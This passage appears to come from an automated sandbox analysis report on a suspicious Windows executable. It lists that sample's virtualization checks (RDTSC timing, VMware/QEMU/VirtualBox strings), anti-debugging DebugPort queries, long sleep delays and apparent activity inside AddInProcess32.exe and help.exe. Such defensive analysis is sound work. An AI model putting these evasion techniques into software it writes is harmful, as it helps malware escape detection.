Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 00000000005D98E4 second address: 00000000005D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 00000000005D9B4E second address: 00000000005D9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 2_2_00409A80 rdtsc

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe TID: 1472	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe TID: 6276	Thread sleep count: 143 > 30
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe TID: 6408	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe TID: 5812	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2220	Thread sleep count: 51 > 30
Source: C:\Windows\explorer.exe TID: 2220	Thread sleep time: -102000s >= -30000s
Source: C:\Windows\SysWOW64\help.exe TID: 1492	Thread sleep count: 33 > 30
Source: C:\Windows\SysWOW64\help.exe TID: 1492	Thread sleep time: -66000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed

Source: 4NoiNHCNoU.exe, 00000000.00000002.680327684.0000000006330000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: 4NoiNHCNoU.exe, 00000000.00000002.680327684.0000000006330000.00000004.00000001.sdmp	Binary or memory string: vmware svga
Source: 4NoiNHCNoU.exe, 00000000.00000002.679218107.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.687596166.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.691777622.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 4NoiNHCNoU.exe, 00000000.00000002.680327684.0000000006330000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: 4NoiNHCNoU.exe, 00000000.00000002.680327684.0000000006330000.00000004.00000001.sdmp	Binary or memory string: tpautoconnsvc#Microsoft Hyper-V
Source: 4NoiNHCNoU.exe, 00000000.00000002.680327684.0000000006330000.00000004.00000001.sdmp	Binary or memory string: cmd.txtQEMUqemu
Source: explorer.exe, 00000003.00000000.688220902.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 4NoiNHCNoU.exe, 00000000.00000002.680327684.0000000006330000.00000004.00000001.sdmp	Binary or memory string: vmusrvc
Source: explorer.exe, 00000003.00000000.691777622.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 4NoiNHCNoU.exe, 00000000.00000002.680327684.0000000006330000.00000004.00000001.sdmp	Binary or memory string: vmsrvc
Source: 4NoiNHCNoU.exe, 00000000.00000002.680327684.0000000006330000.00000004.00000001.sdmp	Binary or memory string: vmtools
Source: 4NoiNHCNoU.exe, 00000000.00000002.680327684.0000000006330000.00000004.00000001.sdmp	Binary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
Source: 4NoiNHCNoU.exe, 00000000.00000002.680327684.0000000006330000.00000004.00000001.sdmp	Binary or memory string: vboxservicevbox)Microsoft Virtual PC
Source: explorer.exe, 00000003.00000002.1013195074.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: 4NoiNHCNoU.exe, 00000000.00000002.679218107.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.687596166.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.691909669.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: 4NoiNHCNoU.exe, 00000000.00000002.679218107.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.687596166.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: 4NoiNHCNoU.exe, 00000000.00000002.680327684.0000000006330000.00000004.00000001.sdmp	Binary or memory string: virtual-vmware pointing device
Source: explorer.exe, 00000003.00000000.691909669.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: 4NoiNHCNoU.exe, 00000000.00000002.679218107.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.687596166.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe

Process information queried: ProcessInformation

Anti Debugging:

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\help.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 2_2_00409A80 rdtsc

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 2_2_0040ACC0 LdrLoadDll,

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A469A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019EC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A541E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019E4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019E4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019E4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019E4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019E4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019EB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019EB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A090AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A43884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A43884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A5B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A47016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A47016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A47016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019DB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019DB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019DB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019DB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A94015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A94015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019E0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019E0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A82073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A91074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A95BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A8138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A7D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A453CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A453CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019EDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A8131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A98B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019DAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019DAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019E3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A04A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A04A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A8AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A8AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A7B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A7B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A98A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A0927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A54257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A8EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A905AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A905AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C2D8A mov eax, dword ptr fs:[00000030h]
